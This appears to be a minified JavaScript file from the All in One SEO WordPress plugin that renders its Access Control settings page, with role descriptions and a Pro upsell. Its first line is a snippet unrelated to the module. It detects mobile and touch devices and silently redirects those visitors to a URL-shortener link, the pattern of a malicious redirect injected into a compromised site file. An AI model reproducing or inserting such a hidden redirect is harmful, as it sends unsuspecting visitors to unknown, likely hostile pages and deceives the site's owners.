(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as O,c as R,h as k}from"./app-core.c8323d51.js";import{_ as e,a as r}from"./vendor-other.39e59221.js";import{u as b,aq as h,f as d,i as S,a0 as p,R as l,v as t,O as B,ad as x,Q as C,j as E,ae as g,U as m,M as A}from"./vendor-vue-ui.232c7c36.js";import{C as U}from"./Blur.dea2904a.js";import{C as w}from"./Card.9ee06a3e.js";import{C as L}from"./ProBadge.7b829f47.js";import{C as M}from"./SettingsRow.7bec777f.js";import{C as N}from"./Index.e286637f.js";import{m as P}from"./vendor-lodash.03129cfe.js";import{_ as D}from"./_plugin-vue_export-helper.eefbdd86.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./Row.2ef96b1a.js";import"./Index.b9859662.js";import"./Button.3cec2279.js";import"./Pencil.683baab8.js";const s="all-in-one-seo-pack",V=()=>{const f={tooltip:r(e("By default, only Administrators have permission to manage %1$s within WordPress. With Access Controls, you can easily extend access permissions to other user roles.",s),"AIOSEO"),accessControl:e("Access Control Settings",s),useDefaultSettings:e("Use Default Settings",s)},n=[{label:e("Administrator",s),name:"administrator",description:r(e("By default Admins have access to %1$sall SEO site settings%2$s",s),"<strong>","</strong>")},{label:e("Editor",s),name:"editor",description:r(e("By default Editors have access to %1$sSEO settings for General Settings, Search Appearance, Social Networks, and Redirects as well as all settings for individual pages and posts.%2$s",s),"<strong>","</strong>")},{label:e("Author",s),name:"author",description:r(e("By default Authors have access to %1$sSEO settings for individual pages and posts that they already have permission to edit.%2$s",s),"<strong>","</strong>")},{label:e("Contributor",s),name:"contributor",description:r(e("By default Contributors have access to %1$sSEO settings for individual pages and posts that they already have permission to edit.%2$s",s),"<strong>","</strong>")},{label:e("SEO Manager",s),name:"seoManager",description:r(e("By default SEO Managers have access to %1$sSEO settings for General Settings, Sitemaps, Link Assistant, Redirects, Local SEO, and individual pages and posts.%2$s",s),"<strong>","</strong>")},{label:e("SEO Editor",s),name:"seoEditor",description:r(e("By default SEO Editors have access to %1$sSEO settings for individual pages and posts.%2$s",s),"<strong>","</strong>")}];return{getRoles:b(()=>{const a=O();return n.concat(Object.keys(a.aioseo.user.customRoles).map(i=>({label:a.aioseo.user.userRoles[i],name:i,description:r(e("By default the %1$s role %2$shas no access%3$s to %4$s settings.",s),a.aioseo.user.roles[i],"<strong>","</strong>","All in One SEO"),dynamic:!0})))}),strings:f}},j={class:"aioseo-access-control-lite"},G={class:"toggle"},$={__name:"AccessControl",setup(f){const n="all-in-one-seo-pack",{getRoles:_,strings:a}=V(),o=P(a,{wpRoles:e("WP Roles (Editor, Author)",n),seoManagerRole:e("SEO Manager Role",n),seoEditorRole:e("SEO Editor Role",n),defaultSettings:e("Default settings that just work",n),granularControl:e("Granular controls per role",n),ctaButtonText:e("Unlock Access Control",n),ctaHeader:r(e("Access Control is a %1$s Feature",n),"PRO")}),i=b(()=>{const c=_.value;let u=1;for(;8>c.length;)c.push({label:e("Custom Role",n)+" "+u,name:"customRole"+u}),u++;return c});return(c,u)=>{const v=h("base-toggle");return d(),S("div",j,[p(t(w),{slug:"accessControl"},{header:l(()=>[E("span",null,m(t(o).accessControl),1),p(t(L))]),tooltip:l(()=>[g(m(t(o).tooltip),1)]),default:l(()=>[p(t(U),null,{default:l(()=>[(d(!0),S(B,null,x(i.value,y=>(d(),C(t(M),{key:y.name,name:y.label},{content:l(()=>[E("div",G,[p(v,{disabled:!0,modelValue:!0},{default:l(()=>[g(m(t(o).useDefaultSettings),1)]),_:1})])]),_:1},8,["name"]))),128))]),_:1}),p(t(N),{"feature-list":[t(o).granularControl,t(o).wpRoles,t(o).seoManagerRole,t(o).seoEditorRole],"cta-link":t(R).getPricingUrl("access-control","access-control-upsell",null,"liteUpgrade"),"button-text":t(o).ctaButtonText,"learn-more-link":t(R).getUpsellUrl("access-control",null,"liteUpgrade"),"align-top":""},{"header-text":l(()=>[g(m(t(o).ctaHeader),1)]),description:l(()=>[g(m(t(o).tooltip),1)]),_:1},8,["feature-list","cta-link","button-text","learn-more-link"])]),_:1})])}}},T={setup(){return{licenseStore:k()}},components:{AccessControl:$,AccessControlLite:$}},W={class:"aioseo-access-control"};function F(f,n,_,a,o,i){const c=h("access-control",!0),u=h("access-control-lite");return d(),S("div",W,[a.licenseStore.isUnlicensed?A("",!0):(d(),C(c,{key:0})),a.licenseStore.isUnlicensed?(d(),C(u,{key:1})):A("",!0)])}const ce=D(T,[["render",F]]);export{ce as default};
